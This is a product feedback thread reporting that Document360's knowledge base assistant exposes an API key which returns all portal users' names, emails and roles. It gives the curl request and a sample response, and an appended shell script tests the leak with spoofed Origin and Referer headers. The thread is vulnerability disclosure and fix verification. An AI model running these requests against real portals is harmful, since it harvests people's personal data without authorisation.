Knowledge Base Assistant Permission Issues
complete
Tobias Moser
For the knowledge base assistant, you need to expose the api_key to end users (see your JavaScript embed code). With this key, users or attackers can download all user information.
Using this curl command…
curl --request GET "https://apihub.document360.io/v2/teams" --header "api_token: <your token>"
…the attacker gets the following response listing all Document360 users:
{
  "result": [
    {
      "user_id": "<your id>",
      "first_name": "<first_name>",
      "last_name": "<last_name>",
      "email_id": "<email>",
      "profile_logo_url": "<profile_logo>",
      "portal_role": "<role>",
      "last_login_at": "<last_login>"
    }
  ],
  "extension_data": null,
  "context": null,
  "success": true,
  "errors": [],
  "warnings": [],
  "information": []
}
Thiru
The issue has been resolved. Kindly validate from your end as well.
Thiru marked this post as complete
Tobias Moser
What is the status of this? In my opinion this is a severe issue, which should raise your attention!
Mike Freeman
I had assumed that usage of the API key would be protected by setting up trusted domains in the 'Keep your assistant secure' section but maybe I am wrong or maybe it doesn't work.
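Thiru's request to validate the fix and Mike's question about trusted domains come down to the same empirical check: does the key shipped in the embed code still return the team listing, and does the Origin the client claims make any difference? The script below is an added probe written for this thread; it is not code from the original posts or from Document360. It assumes the token is passed in the D360_API_TOKEN environment variable, that a trusted-domain allow-list, if it is enforced server-side at all, would be keyed on the browser's Origin/Referer headers (the thread does not say how the setting works), and it uses https://kb.example.com as a placeholder for a domain you have allow-listed. It reports only the number of email_id fields returned, never the addresses themselves.

```shell
#!/usr/bin/env sh
# Probe for the /v2/teams exposure discussed in this thread (added example).
# Assumptions not taken from the page: token in D360_API_TOKEN, allow-list
# enforced via Origin/Referer, https://kb.example.com stands in for one of
# your allow-listed domains. Override any of them via the environment.

API_URL="${D360_API_URL:-https://apihub.document360.io/v2/teams}"
D360_ORIGIN="${D360_ORIGIN:-https://kb.example.com}"   # assumed allow-listed domain

# classify_response STATUS BODY
# LEAK    -> 200 and the body carries "email_id" fields (team listing returned)
# BLOCKED -> server refused the token (401/403)
# OTHER   -> anything else (network failure, empty result, unexpected shape)
classify_response() {
  status="$1"
  body="$2"
  case "$status" in
    401|403) echo BLOCKED ;;
    200)
      if printf '%s' "$body" | grep -q '"email_id"'; then
        echo LEAK
      else
        echo OTHER
      fi ;;
    *) echo OTHER ;;
  esac
}

# count_emails BODY : number of "email_id" fields, i.e. accounts exposed.
# Only the count is reported so the probe output itself does not leak PII.
count_emails() {
  printf '%s' "$1" | grep -o '"email_id"' | wc -l | tr -d ' '
}

# probe LABEL [extra curl args...]
# One request against API_URL with the api_token header plus any extra
# headers, printing: LABEL HTTP_STATUS VERDICT EMAIL_COUNT
probe() {
  label="$1"; shift
  body_file="$(mktemp)"
  status="$(curl -sS -o "$body_file" -w '%{http_code}' --max-time 15 "$@" \
             --header "api_token: $D360_API_TOKEN" "$API_URL")" || status=000
  body="$(cat "$body_file")"; rm -f "$body_file"
  printf '%-15s %s %s %s\n' "$label" "$status" \
    "$(classify_response "$status" "$body")" "$(count_emails "$body")"
}

main() {
  echo "label           status verdict emails"
  # A plain non-browser client: this is what the original curl in the thread did.
  probe no-origin
  # Same token, but claiming to come from the allow-listed domain.
  probe spoofed-origin --header "Origin: $D360_ORIGIN" --header "Referer: $D360_ORIGIN/"
  # Same token, claiming an origin that is certainly not allow-listed.
  probe foreign-origin --header "Origin: https://attacker.invalid"
}

# Only touch the network when a token was actually supplied.
if [ -n "${D360_API_TOKEN:-}" ]; then
  main
fi
```

Run it as `D360_API_TOKEN='<your token>' sh probe.sh`. After the fix, every row should read BLOCKED (or OTHER with an empty result). If no-origin and spoofed-origin both come back LEAK, a domain allow-list is not what protects the key: a non-browser client can send whatever Origin and Referer it likes, so header-based allow-listing only constrains well-behaved browsers. A key that must ship in client-side JavaScript needs to be limited server-side to the knowledge-base content the assistant actually reads, not to portal endpoints such as /v2/teams.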